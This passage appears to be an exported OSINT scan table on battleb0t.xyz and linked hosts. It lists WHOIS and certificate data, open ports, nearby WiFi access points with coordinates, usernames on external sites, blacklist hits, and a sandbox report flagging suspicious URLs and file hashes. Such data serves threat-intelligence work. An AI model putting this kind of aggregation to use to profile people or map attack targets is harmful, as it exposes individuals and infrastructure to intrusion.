u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe5a84e0c629be7b2.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{6e883627-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{6e883629-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa2a380ccf94f2bd9.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\37nu00gp\\favicon[3].ico"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'infor | 185.199.109.153 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.153): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomC3D648 (Net ID: 00:0C:F6:C3:D6:48) | 50.8897, 6.0563 |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NAMECHEAP INC | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | typhoon (Net ID: 00:14:C1:39:FA:69) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | helena (Net ID: 00:06:25:90:14:E1) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5bc4bf4f0229c3-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 02:59:09 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 17:51:43 2022 GMT
Not After : Mar 13 17:51:42 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d2:a8:d4:9f:a9:bd:76:f3:4e:fa:75:b4:78:5e:
d8:6a:71:e4:f3:f9:c2:77:fe:f9:7d:4c:da:66:22:
e0:cd:34:b7:7c:8d:14:1c:4d:7d:46:bd:0d:78:0c:
dd:5b:c4:ff:9f:13:d1:36:82:30:3b:b9:24:f9:65:
eb:d4:82:59:47:e9:be:2d:ca:25:2b:a1:b5:27:87:
63:33:e8:be:3d:46:8c:9b:0f:9e:b7:28:4d:eb:79:
63:20:73:aa:a3:d5:3d:c6:2e:b7:9c:7f:e7:f8:96:
79:6d:51:52:62:f7:cc:65:ca:dd:5b:ef:27:c9:9c:
81:e6:4a:8c:e9:e1:99:cd:79:f8:60:4b:a5:6b:6f:
c9:a2:fa:cc:0c:e7:34:b2:77:b5:de:bd:fe:24:a9:
e6:e9:26:4a:54:ec:0f:53:69:fc:a9:cb:fb:84:2e:
7d:af:75:b6:15:ef:6d:e3:fb:23:27:72:c7:fd:a8:
77:78:c9:f6:5b:6f:b1:0a:09:7c:e3:91:c1:95:13:
b4:4a:b2:6f:b1:ab:4c:4d:0b:11:8c:fd:8d:fb:d9:
37:66:3b:07:7b:cc:19:50:a2:89:0c:ea:8d:f1:d1:
b3:36:06:ad:51:15:23:e4:0c:43:f6:cc:90:55:fa:
98:c8:81:54:f2:2f:f7:d0:0b:4f:9f:38:a8:6c:71:
67:c5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
46:DD:F2:80:57:6C:FD:50:6F:F3:DF:3E:F6:D6:F8:E4:B9:2D:C4:6F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 18:51:43.785 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:E2:3A:9E:51:10:7B:4C:32:13:F1:5A:
6A:72:5F:B6:48:D3:B8:D4:7D:48:A2:D1:1B:9F:EB:E7:
11:FF:38:46:00:02:21:00:D3:77:1A:17:F1:84:6D:6C:
D3:83:45:FF:8A:32:05:10:85:83:2B:14:0A:F5:20:00:
0A:C7:41:FB:1B:F5:B4:74
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 13 18:51:43.756 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A6:36:07:C7:E6:2A:25:82:42:12:4D:
3F:F8:74:7A:85:A6:64:36:C2:59:78:48:20:18:36:E7:
26:72:A3:D3:2A:02:21:00:CE:BD:F6:83:26:75:28:EF:
BF:A1:B5:32:8B:FB:88:31:3E:85:D6:30:F1:F3:D4:9D:
92:CD:06:30:FD:39:59:E8
Signature Algorithm: sha256WithRSAEncryption
a9:06:04:95:e2:ce:64:b2:f3:1c:fd:0a:94:52:d2:fb:cc:c9:
bb:ab:0e:16:c4:1c:35:3d:b4:77:7c:ef:d6:ce:15:8a:5b:9e:
15:7d:14:b0:74:3a:46:24:d1:6f:34:39:94:aa:e4:7f:b3:c9:
dd:04:77:c5:ed:88:f9:56:f6:b2:da:16:f2:de:95:4d:ae:cc:
c8:8f:2c:fe:b6:1f:27:28:b2:fe:3a:41:41:5e:a9:6f:ac:34:
59:b2:f1:77:96:18:6e:7d:12:a0:7b:52:1d:2d:59:87:c8:35:
17:48:37:92:0d:56:c5:76:a2:4a:4c:44:69:ac:a7:c0:72:d3:
f1:3c:5f:67:11:8b:f4:4a:b6:30:14:01:f3:f3:67:9a:5c:2e:
68:09:32:e8:4e:f1:3c:d1:09:b1:a6:43:2f:3e:bb:09:66:13:
cc:5d:ab:f8:25:f6:78:95:33:b3:b2:17:2b:15:e6:77:00:0d:
a1:3e:62:fc:76:b4:f3:f1:09:99:3e:08:aa:64:da:d8:5e:3a:
0f:1e:07:1c:09:b4:d2:9f:70:f7:12:f8:0a:19:e8:db:b1:ab:
d6:b6:c1:9f:ab:18:be:a8:46:0e:6f:9c:06:b3:0d:0a:44:0f:
f9:65:04:25:ce:38:c1:7b:7d:87:a9:b5:0f:1d:54:1a:8b:7d:
b8:c2:59:33
| ayhu.xyz |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | ply.gg | ply.gg |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:8080 | 188.114.96.0/24 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | StreamLabs (Category: finance)
https://streamlabs.com/Altpapier/tip | Altpapier |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:8080 | 188.114.96.0/24 |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:8443 | 188.114.97.0/24 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Bandlab (Category: music)
https://www.bandlab.com/ayshoo | ayshoo |
| 2023-05-12 03:16:28 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 165.232.113.85 |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-111-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-111-153.github.com |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007us.github.io | 185.199.111.153 |
| 2023-05-12 02:57:13 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 65, u'compromised_hosts': [u'34.196.254.27', u'34.196.254.27'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://www.finops.org/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.finops.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_992"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_IE_EarlyTabStart_0xfe4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_ConnHashTable<992>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3e0_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "IsoScope_3e0_ConnHashTable<992>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_3e0_IESQMMUTEX_0_519"\n "IsoScope_3e0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_992"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.196.254.27:80"\n "34.196.254.27:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1485.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1484.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00000992]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000604]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._54909F69-387D-11ED-9389-080027B1E0B5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000992]\n "EPBU3KIU.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\EPBU3KIU.txt]- [targetUID: 00000000-00000604]\n "~DF0A8636DE63BD2D47.TMP" has type "data"- Location: [%TEMP%\\~DF0A8636DE63BD2D47.TMP]- [targetUID: 00000000-00000992]\n "GCFEQE6O.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GCFEQE6O.txt]- [targetUID: 00000000-00000992]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00000604]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "Cab1484.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\Cab1484.tmp]- [targetUID: 00000000-00000604]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00000604]\n "~DF8765436AF976415F.TMP" has type "data"- Location: [%TEMP%\\~DF8765436AF976415F.TMP]- [targetUID: 00000000-00000992]\n "Tar1485.tmp" has type "data"- Location: [%TEMP%\\Tar1485.tmp]- [targetUID: 00000000-00000604]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00000992]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.finops.org/"\n Pattern match: "http://www.finops.org"\n Pattern match: "www.finops.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/92 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.196.254.27": ...\n\n URL: https://nauvesneper1987.netlify.app/ (AV positives: 3/88 scanned on 09/20/2022 02:10:15)\n URL: http://keen-kitsune-bbdc6c.netlify.app/ (AV positives: 5/88 scanned on 09/20/2022 01:48:45)\n URL: http://spincats-mint.xyz/ (AV positives: 1/88 scanned on 09/20/2022 01:39:48)\n URL: http://guileless-piroshki-66ded8.netlify.app/ (AV positives: 8/89 scanned on 09/20/2022 01:00:01)\n URL: http://candid-moxie-ca3d19.netlify.app/ (AV positives: 6/89 scanned on 09/20/2022 00:18:36)\n File SHA256: 78552f5436b9bf8f079510592f7d61c991abc31f687db116c76cda7b3d1de8dd (AV positives: 3/74 scanned on 09/16/2022 23:21:30)\n File SHA256: 8a18b93b6700b5d9608bdab276c73e2ad97d2d7db16de798d4f35bf99e1feb8b (AV positives: 10/75 scanned on 09/16/2022 23:59:21)\n File SHA256: 9855d6610d262f5c5ac33a4824ce6d6aff9434181e2925d2e8502f55e0f4ccc2 (AV positives: 9/75 scanned on 09/13/2022 23:52:30)\n File SHA256: 6fbdf58ac0a20649648d8b3f171ad22b5a0f75015f17f61cd9b7097a86841671 (AV positives: 22/75 scanned on 09/10/2022 23:18:07)\n File SHA256: 10eb6a8b65dc19a76287d777aa59dd82975f4af0a30f3493a4c67e21c064d0ad (AV positives: 19/75 scanned on 09/08/2022 20:19:43)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-33', u'name': u'Malicious artifacts seen in the context of the input URL', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 7, u'description': u'Found malicious artifacts related to the input domain "http://www.finops.org" (IP: 34.196.254.27): ...\n\n URL: https://nauvesneper1987.netlify.app/ (AV positives: 3/88 scanned on 09/20/2022 02:10:15)\n URL: http://keen-kitsune-bbdc6c.netlify.app/ (AV positives: 5/88 scanned on 09/20/2022 01:48:45)\n URL: http://spinca | 35.229.48.116 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | " (Cloaked) (Net ID: 00:01:36:59:CB:CF) | 37.780462,-122.390564 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2082 | 172.67.135.9 |
| 2023-05-12 02:56:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:cc:cb:40:35:8f:10:16:7b:c7:37:cb:94:7e:31:1a
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Mar 23 00:00:00 2023 GMT
Not After : Mar 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:c7:e0:ee:e2:73:a9:c6:66:6e:30:ed:fc:ae:52:
d4:ca:18:2f:13:3b:72:ab:38:92:54:46:c1:4d:8e:
47:44:3c:fd:42:6f:de:16:4a:26:42:38:ad:e6:91:
f4:0b:0b:51:3f:e6:50:3a:4c:ca:ea:9e:3d:ae:a2:
1a:21:17:88:b9
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
ED:98:C9:DB:21:9F:40:A3:B3:0F:A1:47:F2:8D:C0:DD:DA:EB:C7:D1
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA256
30:46:02:21:00:f0:9f:8d:f6:d4:d5:c9:85:3d:e1:3b:e8:89:
39:bb:cd:62:6f:8c:ee:3f:e9:ac:78:6c:9b:85:17:ee:a9:64:
05:02:21:00:e4:53:28:da:31:66:f2:dc:34:6e:1b:42:2d:d7:
79:d3:ee:4b:3d:8a:1c:37:ce:37:5d:dc:4f:bf:b9:94:32:b3
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet92D6 (Net ID: 00:01:36:5B:92:D4) | 34.0544, -118.244 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8002::153 | battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE514 (Net ID: 00:02:2D:8C:DC:7C) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Flickr (Category: images)
https://www.flickr.com/photos/login/ | login |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:09:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | scoop.sh | scoop.sh |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.232): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:00 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [207.154.224.0/20]
http://cinsscore.com/list/ci-badguys.txt | 207.154.224.0/20 |
